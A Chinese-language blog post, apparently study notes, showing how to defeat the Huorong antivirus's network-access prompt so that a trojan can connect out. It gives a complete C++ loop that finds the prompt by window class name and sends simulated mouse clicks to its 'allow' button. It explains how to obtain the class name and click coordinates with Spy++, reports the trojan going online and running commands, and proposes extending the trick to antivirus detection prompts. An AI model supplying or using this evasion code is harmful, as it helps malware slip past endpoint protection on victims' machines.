后台点击绕过火绒联网检测
看到某个师傅的后台点击绕过火绒的联网检测。觉得值得一看,所以就记录学习一下.
演示

发现如果直接运行木马的话,就会曝出联网检测。
现在我们打开编译好的,模拟点击。


就会瞬间关闭火绒的联网控制,而且点的是允许。现在我们换成我上次写的某个木马进行尝试。


成功上线并执行命令
代码分析
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| #include <iostream> #include<Windows.h> int main() { while (true) {
HWND hwnd1 = FindWindow("ATL:01145CF8", NULL);
std::cout << hwnd1 << std::endl; if (hwnd1 != NULL) { SendMessage(hwnd1, WM_LBUTTONDOWN, MK_LBUTTON, MAKELPARAM(309, 429)); SendMessage(hwnd1, WM_LBUTTONUP, MK_LBUTTON, MAKELPARAM(309, 429)); } Sleep(1); } }
|
其实也就是一个小玩具,我们每一个每一个函数来进行解析。
1 2
| HWND hwnd1 = FindWindow("ATL:01145CF8", NULL) 这个函数其实就是实例化了一对象,HWND表示窗口句柄类的,hwnd1就是我们要获取到的窗口句柄。FindWindows,看名字就知道这个函数是干什么得了,找一个窗口。其中有两个参数第一个参数的意思是你要找的窗口的类名,这里就需要使用我们的spy++工具去获取目标电脑上面的火绒联网弹窗类名。获取到之后就填到这个函数里面就可以了。第二个参数是窗口的名称,用来指定要匹配的窗口名称,如果为NULL的话就匹配所有的窗口。
|
1 2 3 4
| SendMessage(hwnd1, WM_LBUTTONDOWN, MK_LBUTTON, MAKELPARAM(309, 429)); SendMessage(hwnd1, WM_LBUTTONUP, MK_LBUTTON, MAKELPARAM(309, 429)); 上面的判断和输出都是最基础的我就不写了,这里判断检测到窗口之后,就会执行下面的代码。这是一个sendmessage函数,他的作用就是发送一些操作到我们指定的窗口去。第一个参数就需要输入窗口句柄,第二个参数是执行什么东西,我这里就是WM_LBUTTONDOWN和up,意思就是按下鼠标左键和释放鼠标左键的意思。后面两个参数指定了软模拟鼠标的需要点击的坐标。坐标是相对坐标,也就是以你这个句柄的左上角为原点建立的一个坐标系。窗口大小的话同样也可以使用spy++工具来进行获取。我这里都坐标就是点击右下角,因为我的木马还没编译,所以是python执行的,在白名单里面,允许按钮在右下角。如果不是在白名单里面,那么,你就需要吧429改成0点击左下角的允许即可。
|
根据这个模拟键鼠的思路,其实后续我们可以试一下报毒的时候能不能模拟键鼠。